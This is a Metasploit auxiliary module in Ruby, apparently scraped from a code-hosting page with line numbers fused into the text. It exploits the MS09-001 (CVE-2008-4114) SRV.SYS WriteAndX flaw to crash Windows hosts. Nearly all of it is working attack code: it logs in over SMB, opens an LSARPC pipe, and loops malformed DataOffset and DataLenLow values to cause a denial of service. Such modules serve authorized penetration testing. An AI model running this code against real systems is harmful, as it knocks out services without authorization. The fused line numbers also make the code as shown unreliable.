Path: blob/master/modules/auxiliary/dos/windows/smb/ms09_001_write.rb
19535 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::SMB::Client7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',14'Description' => %q{15This module exploits a denial of service vulnerability in the16SRV.SYS driver of the Windows operating system.1718This module has been tested successfully against Windows Vista.19},2021'Author' => [ 'j.v.vallejo[at]gmail.com' ],22'License' => MSF_LICENSE,23'References' => [24['MSB', 'MS09-001'],25['OSVDB', '48153'],26['CVE', '2008-4114'],27['BID', '31179'],28],29'Notes' => {30'Stability' => [CRASH_SERVICE_DOWN],31'SideEffects' => [],32'Reliability' => []33}34)35)3637deregister_options('SMB::ProtocolVersion')38end3940def send_smb_pkt(dlenlow, doffset, fillersize)41connect(versions: [1])42smb_login4344pkt = CONST::SMB_CREATE_PKT.make_struct45pkt['Payload']['SMB'].v['Flags1'] = 0x1846pkt['Payload']['SMB'].v['Flags2'] = 0xc8074748pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i49pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i50pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i51pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i5253pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX5455pkt['Payload']['SMB'].v['WordCount'] = 245657pkt['Payload'].v['AndX'] = 25558pkt['Payload'].v['AndXOffset'] = 0xdede59pkt['Payload'].v['FileNameLen'] = 1460pkt['Payload'].v['CreateFlags'] = 0x1661pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed62pkt['Payload'].v['ShareAccess'] = 763pkt['Payload'].v['CreateOptions'] = 0x40004064pkt['Payload'].v['Impersonation'] = 265pkt['Payload'].v['Disposition'] = 166pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"6768simple.client.smb_send(pkt.to_s)69ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)7071pkt = CONST::SMB_WRITE_PKT.make_struct72_data_offset = pkt.to_s.length - 473filler = Rex::Text.rand_text(fillersize)7475pkt['Payload']['SMB'].v['Signature1'] = 0xcccccccc76pkt['Payload']['SMB'].v['Signature2'] = 0xcccccccc77pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i78pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i79pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i80pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i81pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX82pkt['Payload']['SMB'].v['Flags1'] = 0x1883pkt['Payload']['SMB'].v['Flags2'] = 0xc80784pkt['Payload']['SMB'].v['WordCount'] = 1485pkt['Payload'].v['AndX'] = 25586pkt['Payload'].v['AndXOffset'] = 0xdede87pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']88pkt['Payload'].v['Offset'] = 089pkt['Payload'].v['Reserved2'] = -190pkt['Payload'].v['WriteMode'] = 891pkt['Payload'].v['Remaining'] = fillersize92pkt['Payload'].v['DataLenHigh'] = 093pkt['Payload'].v['DataLenLow'] = dlenlow # <==================94pkt['Payload'].v['DataOffset'] = doffset # <====95pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc # <====96pkt['Payload'].v['ByteCount'] = fillersize # <====97pkt['Payload'].v['Payload'] = filler9899simple.client.smb_send(pkt.to_s)100end101102def run103print_line('Attempting to crash the remote host...')104k = 72105j = 0xffff106while j > 10000107i = 0xffff108while i > 10000109begin110print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")111send_smb_pkt(i, j, k)112rescue StandardError113print_line('rescue')114end115i -= 10000116end117j -= 10000118end119end120end121122123